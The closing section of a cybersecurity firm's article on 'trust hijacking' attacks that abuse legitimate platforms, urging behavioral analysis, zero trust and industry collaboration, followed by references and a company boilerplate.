At Tranchulas, our analysis of these emerging threats reinforces our long-standing belief that the most dangerous attacks are those that exploit trust relationships and legitimate infrastructure. The organizations that will successfully defend against trust hijacking attacks are those that recognize the fundamental shift in the threat landscape and adapt their security strategies accordingly. This adaptation requires more than simply deploying new tools or technologies; it demands a comprehensive rethinking of security architecture, processes, and organizational capabilities.
The path forward requires organizations to embrace behavioral analysis, zero trust principles, and advanced threat hunting capabilities while maintaining the operational flexibility that makes legitimate platforms valuable for business operations. The challenge lies not in abandoning these platforms but in developing the sophisticated monitoring, analysis, and response capabilities necessary to distinguish between legitimate and malicious usage patterns.
The trust hijacking trend also highlights the critical importance of collaboration between organizations, security vendors, and platform providers in addressing these emerging threats. No single organization can effectively combat attacks that leverage the global infrastructure of major technology companies. Success requires coordinated efforts to develop detection capabilities, share threat intelligence, and implement platform-level security improvements that can benefit the entire ecosystem.
The cybersecurity industry stands at a critical juncture where traditional approaches must evolve to address a fundamentally transformed threat landscape. Organizations that continue to rely on signature-based detection, reputation filtering, and perimeter-focused security models will find themselves increasingly vulnerable to sophisticated attacks that operate within their trusted ecosystem. The time for incremental improvements has passed; what is required now is transformational change in how organizations approach cybersecurity in an era where trust itself has become weaponized.
The future belongs to organizations that can successfully balance the operational benefits of legitimate platforms with the security requirements necessary to detect and prevent their abuse. This balance requires sophisticated understanding of both the platforms themselves and the ways in which they can be exploited, combined with the analytical capabilities necessary to identify malicious activities within the vast ocean of legitimate platform usage. The organizations that master this balance will not only survive the trust hijacking era but will emerge stronger and more resilient than ever before.

References

[1] ANY.RUN. (2025, June 26). Top 3 Cyber Attacks in June 2025: GitHub Abuse, Control Flow Flattening, and More. Retrieved from https://medium.com/@anyrun/top-3-cyber-attacks-in-june-2025-github-abuse-control-flow-flattening-and-more-759bf170ccd8
[2] Redbot Security. (2025, June 4). Living Off the Land (LotL) Attacks Explained. Retrieved from https://redbotsecurity.com/living-off-the-land-lotl-attacks-explained/
[3] Cybersecurity Insiders. (2025, June 2). Weekly Top 10: Threat Actors Abuse Google Apps Script in Evasive Phishing Attacks. Retrieved from https://innovatecybersecurity.com/security-threat-advisory/weekly-top-10-06-02-2025-threat-actors-abuse-google-apps-script-in-evasive-phishing-attacks-cybercriminals-camouflaging-threats-as-ai-tool-installers-mark-your-calendar-apt41-innovative-tactics/

About Tranchulas: We are a global cybersecurity leader delivering advanced offensive and defensive solutions, compliance expertise, and managed security services. With specialized capabilities addressing ransomware, AI-driven threats, and shifting compliance demands, we empower enterprises and governments worldwide to secure operations, foster innovation, and thrive in today’s digital-first economy. Learn more at tranchulas.com.